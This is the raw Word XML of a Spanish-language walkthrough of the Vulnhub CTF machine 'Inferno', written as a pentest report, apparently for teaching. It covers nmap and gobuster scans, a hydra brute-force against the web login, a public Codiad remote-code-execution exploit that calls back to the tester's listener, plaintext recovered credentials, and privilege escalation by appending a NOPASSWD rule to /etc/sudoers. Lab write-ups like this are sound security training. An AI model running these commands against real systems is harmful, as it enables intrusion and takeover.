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jc w:val="both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swlocn1u5vq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jc w:val="both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Ético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360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Work Sans ExtraLight" w:cs="Work Sans ExtraLight" w:eastAsia="Work Sans ExtraLight" w:hAnsi="Work Sans ExtraLight"/>
          <w:color w:val="232a3c"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72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72"/>
          <w:szCs w:val="72"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTF INFERNO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sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9g3tputfrnn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="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:color w:val="af7b51"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_olzdrdxilmy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Work Sans Medium" w:cs="Work Sans Medium" w:eastAsia="Work Sans Medium" w:hAnsi="Work Sa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Work Sans Medium" w:cs="Work Sans Medium" w:eastAsia="Work Sans Medium" w:hAnsi="Work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vj79stl5ik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Enumeración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8zf1bwwas1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Penetración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yym2386n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22/tcp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4msi1bjud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Fuzzing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da3fq8ar2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Fuerza bruta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zzkfvqs1a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Vulnerabilidades registradas relacionadas con Codiad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8gzqp7lt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exploit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lwh1ad75q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Credenciales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rut8bsbu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Flag 1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bhzdzkjas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Escalada de privilegios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rn5ee0ngg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Flag 2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bnykp0x1g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spacing w:before="200" w:lineRule="auto"/>
        <w:jc w:val="both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widowControl w:val="0"/>
        <w:spacing w:after="240" w:before="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Work Sans" w:cs="Work Sans" w:eastAsia="Work Sans" w:hAnsi="Work Sans"/>
          <w:b w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_zd2ykv69j0pa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30j0zll" w:id="5"/>
      <w:bookmarkEnd w:id="5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spacing w:before="0" w:line="240" w:lineRule="auto"/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e realizará un de los retos CTF llamados INFERNO de la plataforma Vulnhub. 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1fob9te" w:id="6"/>
      <w:bookmarkEnd w:id="6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0">
      <w:pPr>
        <w:spacing w:before="0" w:line="24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El propósito de este informe es mostrar una prueba de penetración en una red de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3znysh7" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Requerimientos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:spacing w:after="200" w:before="0" w:line="288" w:lineRule="auto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Para la replicación de este informe será necesario contar con los siguientes elementos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88" w:lineRule="auto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Conexión de red local.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Software de virtualización ( Virtualbox ).</w:t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8vj79stl5ikd" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumeración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nmap -sn 192.168.56.0/24 -n -T5 | grep report &gt; hosts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19600" cy="1533525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nmap -sS -p-  192.168.56.0/24 -n --min-rate=5000 &gt; ports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9725" cy="1743075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174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lista continua… Descubrimos la máquina a explotar en la ip 192.168.56.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1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nmap -sC 192.168.56.14 -n --min-rate=5000 -o full -vv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438400"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="1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widowControl w:val="0"/>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h8zf1bwwas15" w:id="9"/>
            <w:bookmarkEnd w:id="9"/>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Penetración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3"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4dyym2386nql" w:id="10"/>
            <w:bookmarkEnd w:id="10"/>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">22/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="545.97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Analizamos el código fuente del index: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view-sourcehttp//192.168.56.14/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52875" cy="48768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2062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8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Sospecho de mensajes ocultos en la imagen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8450" cy="307777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27500" t="28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50" cy="307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Elaboro un diccionario con las palabras de la página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cewl -d 0 </w:t>
            </w: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http//192.168.56.14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-w wordlist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Hago uso de una imagen docker que ya tiene instaladas herramientas forenses y habilita la opción mediante un script lanzarlas consecutivamente hasta lograr un resultado.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Recojo el wordlist y el archivo a investigar en la misma carpeta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docker run --rm -it -v ./data dominicbreuker/stego-toolkit /bin/bash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41940" cy="404887"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="2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940" cy="4048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Nada sospechoso.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widowControl w:val="0"/>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dk4msi1bjudc" w:id="11"/>
            <w:bookmarkEnd w:id="11"/>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Fuzzing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** ip → 192.168.136.14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gobuster dir -u http//192.168.136.14 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -x php,txt,html,jpg,js,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254500"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="1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5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Error 401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falta de credenciales de acceso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501900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widowControl w:val="0"/>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_oda3fq8ar2mi" w:id="12"/>
            <w:bookmarkEnd w:id="12"/>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Fuerza bruta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Intentamos conseguir acceso del usuario administrador por defecto (admin)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hydra -l admin -P /usr/share/wordlists/rockyou.txt.gz -f $ip http-get /inferno/ -t64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95500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48200" cy="3419475"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="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72050" cy="680085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800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Buscando variables de entorno el el proyecto podemos ver el </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">config.php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archivo podemos ver que se trata de una plataforma web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http//codiac.co/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3"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_32zzkfvqs1ac" w:id="13"/>
            <w:bookmarkEnd w:id="13"/>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerabilidades registradas relacionadas con Codiad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https//www.cvedetails.com/vulnerability-list/vendor_id-13030/product_id-26787/Codiad-Codiad.html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https//www.exploit-db.com/exploits/49705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3"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h58gzqp7lt52" w:id="14"/>
            <w:bookmarkEnd w:id="14"/>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="125.97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https//github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit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python2 exploit.py http//admindante1@192.168.136.14/inferno/ 'admin' 'dante1' 192.168.136.124 69 linux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Ventana 1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1082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Ventana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52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Ventana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3200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1300" cy="828675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Encontramos un archivo interesante en downloads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9638" cy="4216725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421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38663" cy="5781214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663" cy="57812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2"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nmlwh1ad75qg" w:id="15"/>
            <w:bookmarkEnd w:id="15"/>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Credenciales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danteV1rg1l10h3lpm3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ssh dante@192.168.136.14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81275" cy="6000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1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dlrut8bsbu30" w:id="16"/>
            <w:bookmarkEnd w:id="16"/>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag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858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2"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6bhzdzkjask7" w:id="17"/>
            <w:bookmarkEnd w:id="17"/>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Escalada de privilegios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049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Tenemos privilegios para usar el comando tee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echo 'dante ALL=(ALL) NOPASSWDALL' | sudo tee -a /etc/sudoers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57650" cy="733425"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="2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1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8nrn5ee0nggc" w:id="18"/>
            <w:bookmarkEnd w:id="18"/>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag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8745" cy="2633663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745" cy="2633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1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_r4bnykp0x1gv" w:id="19"/>
            <w:bookmarkEnd w:id="19"/>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Bibliografía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</w:t>
            </w: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https//www.kali.org/docs/containers/installing-docker-on-kali/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Nmap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Stego-toolkit container </w:t>
            </w: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https//github.com/DominicBreuker/stego-toolkit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gobuster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footerReference r:id="rId37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  <w:font w:name="Courier New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Helvetica Neue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Noto Sans Symbols">
    <w:embedRegular w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId25" w:subsetted="0"/>
    <w:embedBold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left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Work Sans" w:cs="Work Sans" w:eastAsia="Work Sans" w:hAnsi="Work Sans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  <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="38761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color w:val="6aa84f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exploit-db.com/exploits/49705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github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit" TargetMode="External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20.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image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21.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.56.14" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kali.org/docs/containers/installing-docker-on-kali/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DominicBreuker/stego-toolkit" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://http.cat/status/401" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml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hyperlink" Target="https://www.cvedetails.com/vulnerability-list/vendor_id-13030/product_id-26787/Codiad-Codiad.html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22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/HelveticaNeue-bold.ttf"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/HelveticaNeue-regular.ttf"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/HelveticaNeue-boldItalic.ttf"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/HelveticaNeue-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SourceCodePro-regular.ttf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/NotoSansSymbols-bold.ttf"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/NotoSansSymbol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WorkSansMedium-regular.ttf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/SourceCodePro-boldItalic.ttf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/WorkSansMedium-italic.ttf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/WorkSansMedium-bold.ttf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/WorkSans-regular.ttf"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/WorkSansMedium-boldItalic.ttf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/WorkSans-italic.ttf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Work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